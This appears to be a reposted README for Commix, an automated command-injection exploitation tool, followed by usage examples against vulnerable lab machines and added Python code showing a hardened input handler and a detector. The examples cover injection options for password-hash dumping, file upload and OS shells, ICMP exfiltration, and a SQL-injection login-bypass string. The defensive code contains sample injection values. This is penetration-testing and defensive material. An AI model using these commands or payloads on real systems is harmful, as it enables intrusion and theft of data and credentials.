Commix - Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool that you can use to test web-based applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a given vulnerable parameter or HTTP header.
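To make concrete what such a scanner is looking for on the server side, here is an added Python 3 illustration (not commix code, and not taken from any of the lab applications named on this page) of the "ping a host" handler pattern: the vulnerable form splices the request parameter into a shell command line, the hardened form allow-lists the value as a literal IP address and passes it to the process as a single argument with no shell involved. The `ip` form field name is assumed from the DVWA-style example further down.

```python
"""Vulnerable vs. hardened handling of a user-supplied 'ip' parameter.
Added illustration; not commix code. Python 3 is assumed."""
import ipaddress
import subprocess


def vulnerable_ping_command(ip: str) -> str:
    # VULNERABLE: the parameter becomes part of a shell command line, so
    # metacharacters such as ';', '|', backticks or '$()' change what runs.
    return "ping -c 1 " + ip


def is_valid_target(value: str) -> bool:
    """Allow-list check: accept only a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def hardened_ping_argv(ip: str) -> list:
    """Return the argv list for ping, refusing anything that is not an address.
    A list passed to subprocess (no shell=True) keeps the value a single
    argument that is never parsed by a shell."""
    if not is_valid_target(ip):
        raise ValueError("rejected target: %r" % (ip,))
    return ["ping", "-c", "1", ip]


def run_ping(ip: str) -> int:
    """Execute the hardened form and return ping's exit status."""
    return subprocess.run(hardened_ping_argv(ip), check=False).returncode


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate address, three that a shell
    # would reinterpret if spliced into a command line.
    for candidate in ["127.0.0.1", "127.0.0.1; id", "`id`", "127.0.0.1 | hostname"]:
        verdict = "accepted" if is_valid_target(candidate) else "rejected"
        print(repr(candidate), "->", verdict)
```

The two defences are independent: the allow-list rejects anything that is not an address, and the argv form means that even a value that slipped past validation would reach `ping` as one opaque argument rather than be parsed by a shell.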

Requirements

  • Python 2.6.x or 2.7.x
  • Linux/ Mac OS X/ Windows (experimental)


Installation

Download commix by cloning the Git repository:

    git clone http://ift.tt/2iPAE5V commix

Commix is also packaged in the official repositories of several Linux distributions, so you can install it with the distribution's package manager.

Commix also comes as a plugin, on the following penetration testing frameworks:
  • TrustedSec's Penetration Testers Framework (PTF)
  • OWASP Offensive Web Testing Framework (OWTF)
  • CTF-Tools
  • PentestBox
  • PenBox
  • Katoolin
  • Aptive's Penetration Testing tools
  • Homebrew Tap - Pen Test Tools

Usage:

    python commix.py [option(s)]


Options:
-h, --help Show help and exit.


General:
These options relate to general matters.


-v VERBOSE Verbosity level (0-4, Default: 0).

--install Install 'commix' to your system.

--version Show version number and exit.

--update Check for updates (apply if any) and exit.

--output-dir=OUT.. Set custom output directory path.

-s SESSION_FILE Load session from a stored (.sqlite) file.

--flush-session Flush session files for current target.

--ignore-session Ignore results stored in session file.

-t TRAFFIC_FILE Log all HTTP traffic into a textual file.

--batch Never ask for user input, use the default behaviour.

--charset=CHARSET Force character encoding used for data retrieval.

--check-internet Check internet connection before assessing the target.


Target:
This option has to be provided to define the target URL.


-u URL, --url=URL Target URL.

--url-reload Reload target URL after command execution.

-l LOGFILE Parse target from HTTP proxy log file.

-m BULKFILE Scan multiple targets given in a textual file.

-r REQUESTFILE Load HTTP request from a file.

--crawl=CRAWLDEPTH Crawl the website starting from the target URL (1-2, Default: 0).

-x SITEMAP_URL Parse target(s) from remote sitemap(.xml) file.


Request:
These options can be used to specify how to connect to the target URL.


-d DATA, --data=.. Data string to be sent through POST.

--host=HOST HTTP Host header.

--referer=REFERER HTTP Referer header.

--user-agent=AGENT HTTP User-Agent header.

--random-agent Use a randomly selected HTTP User-Agent header.

--param-del=PDEL Set character for splitting parameter values.

--cookie=COOKIE HTTP Cookie header.

--cookie-del=CDEL Set character for splitting cookie values.

-H HEADER, --hea.. Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').

--headers=HEADERS Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

--proxy=PROXY Use an HTTP proxy (e.g. '127.0.0.1:8080').

--tor Use the Tor network.

--tor-port=TOR_P.. Set Tor proxy port (Default: 8118).

--tor-check Check to see if Tor is used properly.

--auth-url=AUTH_.. Login panel URL.

--auth-data=AUTH.. Login parameters and data.

--auth-type=AUTH.. HTTP authentication type (e.g. 'Basic' or 'Digest').

--auth-cred=AUTH.. HTTP authentication credentials (e.g. 'admin:admin').

--ignore-401 Ignore HTTP error 401 (Unauthorized).

--force-ssl Force usage of SSL/HTTPS.

--ignore-redirects Ignore redirection attempts.

--retries=RETRIES Retries when the connection times out (Default: 3).


Enumeration:
These options can be used to enumerate the target host.


--all Retrieve everything.

--current-user Retrieve current user name.

--hostname Retrieve current hostname.

--is-root Check if the current user has root privileges.

--is-admin Check if the current user has admin privileges.

--sys-info Retrieve system information.

--users Retrieve system users.

--passwords Retrieve system users' password hashes.

--privileges Retrieve system users privileges.

--ps-version Retrieve PowerShell's version number.


File access:
These options can be used to access files on the target host.


--file-read=FILE.. Read a file from the target host.

--file-write=FIL.. Write to a file on the target host.

--file-upload=FI.. Upload a file on the target host.

--file-dest=FILE.. Host's absolute filepath to write and/or upload to.


Modules:
These options can be used to increase the detection and/or injection capabilities.


--icmp-exfil=IP_.. The 'ICMP exfiltration' injection module (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

--dns-server=DNS.. The 'DNS exfiltration' injection module (domain name used for DNS exfiltration attack).

--shellshock The 'shellshock' injection module.


Injection:
These options can be used to specify which parameters to inject and to provide custom injection payloads.


-p TEST_PARAMETER Testable parameter(s).

--skip=SKIP_PARA.. Skip testing for given parameter(s).

--suffix=SUFFIX Injection payload suffix string.

--prefix=PREFIX Injection payload prefix string.

--technique=TECH Specify injection technique(s) to use.

--skip-technique.. Specify injection technique(s) to skip.

--maxlen=MAXLEN Set the max length of output for time-related injection techniques (Default: 10000 chars).

--delay=DELAY Seconds to delay between each HTTP request.

--time-sec=TIMESEC Seconds to delay the OS response (Default: 1).

--tmp-path=TMP_P.. Set the absolute path of web server's temp directory.

--web-root=WEB_R.. Set the web server document root directory (e.g. '/var/www').

--alter-shell=AL.. Use an alternative os-shell (e.g. 'Python').

--os-cmd=OS_CMD Execute a single operating system command.

--os=OS Force back-end operating system (e.g. 'Windows' or 'Unix').

--tamper=TAMPER Use given script(s) for tampering injection data.

--msf-path=MSF_P.. Set a local path where metasploit is installed.

--backticks Use backticks instead of "$()" for command substitution.


Detection:
These options can be used to customize the detection phase.


--level=LEVEL Level of tests to perform (1-3, Default: 1).

--skip-calc Skip the mathematic calculation during the detection phase.

--skip-empty Skip testing the parameter(s) with empty value(s).

--failed-tries=F.. Set a number of failed injection tries, in file-based technique.


Miscellaneous:
--dependencies Check for third-party (non-core) dependencies.

--purge-output Safely remove all content from output directory.

--skip-waf Skip heuristic detection of WAF/IPS/IDS protection.

--mobile Imitate smartphone through HTTP User-Agent header.

--offline Work in offline mode.

--wizard Simple wizard interface for beginner users.

--disable-coloring Disable console output coloring.

Examples:

  root@kali:~/commix# python commix.py --url="http://ift.tt/2zP5UtA
vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security
=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
  • Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOjNbN
wizard/index.php?type=test" --prefix="'" --suffix="//"
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPi9Xb
index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=
127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
  • Exploiting Persistence using ICMP exfiltration technique:
  root@kali:~/commix# python commix.py --url="http://ift.tt/1CpDUGG" 
--data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
  • Exploiting Persistence using an alternative (python) shell:
  root@kali:~/commix# python commix.py --url="http://ift.tt/1CpDUGG"
--data="addr=127.0.0.1" --alter-shell="Python"
  root@kali:~/commix# python commix.py --url="http://ift.tt/1J4CGsD" 
--data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/
index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPi7i6
drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser"
--technique="f" --root-dir="/"
  root@kali:~/commix# python commix.py --url="http://ift.tt/1DkAzun" 
--shellshock
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zPfkoY
scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOE0hp
scenarios/user-agent/ua(blind).php" --level=3
  root@kali:~/commix# python commix.py --url="http://ift.tt/2zOE0hp
scenarios/referer/referer(classic).php" --level=3
  • Exploiting Flick 2 using custom headers and base64 encoding option:
  root@kali:~/commix# python commix.py --url="http://ift.tt/2pWQioj" 
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
  root@kali:~/commix# python commix.py --url="http://ift.tt/2CaCdt7
scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
  • Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
  root@kali:~/commix# python commix.py --url="http://ift.tt/2Eg3l7l" 
--shellshock --proxy="192.168.2.8:3128"
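The examples above inject through query parameters, POST bodies (form-encoded and JSON), cookies, the User-Agent and the Referer, so a detection rule that only looks at the query string misses most of them. The following added Python 3 example (not commix code and not a real server log format; the per-request dict layout and the records themselves are constructed for illustration) inspects every one of those positions, decodes the values, and flags shell metacharacters, raising the severity when a delay primitive is present, since the blind techniques the option list describes (`--time-sec`, `--technique`) rely on a measurable delay.

```python
"""Detection pass over constructed web-request records for the positions a
command-injection scanner probes: query, body, Cookie, User-Agent, Referer.
Added illustration; the record layout is an assumption, not a server format."""
import re
from urllib.parse import parse_qsl, unquote_plus

# Chaining and substitution metacharacters. The page notes commix can use
# either "$()" or backticks for command substitution.
SHELL_META = re.compile(r"(;|\|\||\||&&|`|\$\()")
# Time-based (blind) probes need a delay; these are the usual primitives on
# Unix and Windows, so their presence strengthens a hit.
DELAY_HINT = re.compile(r"\b(sleep|timeout|ping\s+-n)\b", re.IGNORECASE)

# Constructed sample records: one benign request, then three probes placed in
# the body, the cookie and the User-Agent respectively (values are URL-encoded
# where a browser would encode them).
CONSTRUCTED_RECORDS = [
    {"src": "10.0.0.5", "path": "/vulnerabilities/exec/", "body": "ip=127.0.0.1&submit=submit",
     "cookie": "security=medium", "ua": "Mozilla/5.0", "referer": "http://lab.example/"},
    {"src": "10.0.0.9", "path": "/vulnerabilities/exec/", "body": "ip=127.0.0.1%3B+sleep+1&submit=submit",
     "cookie": "security=medium", "ua": "Mozilla/5.0", "referer": "http://lab.example/"},
    {"src": "10.0.0.9", "path": "/scenarios/cookie/cookie(blind).php", "body": "",
     "cookie": "addr=127.0.0.1%60id%60", "ua": "Mozilla/5.0", "referer": ""},
    {"src": "10.0.0.9", "path": "/scenarios/user-agent/ua(blind).php", "body": "",
     "cookie": "", "ua": "Mozilla/5.0 $(hostname)", "referer": ""},
]


def _values(record):
    """Yield (location, decoded value) pairs for every injectable position."""
    _path, _, query = record["path"].partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield ("query:" + name, value)
    for name, value in parse_qsl(record.get("body", ""), keep_blank_values=True):
        yield ("body:" + name, value)
    for part in record.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            yield ("cookie:" + name, unquote_plus(value))
    yield ("header:User-Agent", record.get("ua", ""))
    yield ("header:Referer", record.get("referer", ""))


def classify(record):
    """Return a list of (location, severity) findings for one request."""
    findings = []
    for where, value in _values(record):
        if SHELL_META.search(value):
            severity = "high" if DELAY_HINT.search(value) else "medium"
            findings.append((where, severity))
    return findings


def scan(records):
    """Map source address -> findings for every record that triggered a rule."""
    hits = {}
    for rec in records:
        found = classify(rec)
        if found:
            hits.setdefault(rec["src"], []).extend(found)
    return hits


if __name__ == "__main__":
    for src, found in scan(CONSTRUCTED_RECORDS).items():
        print(src, found)
```

Decoding before matching matters: the `%3B` and `%60` in the constructed body and cookie are `;` and a backtick once decoded, and a rule run on the raw encoded text would miss both. Grouping findings by source address also surfaces the scanner pattern itself, one client probing several positions of several pages in quick succession.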

from Effect Hacking full article here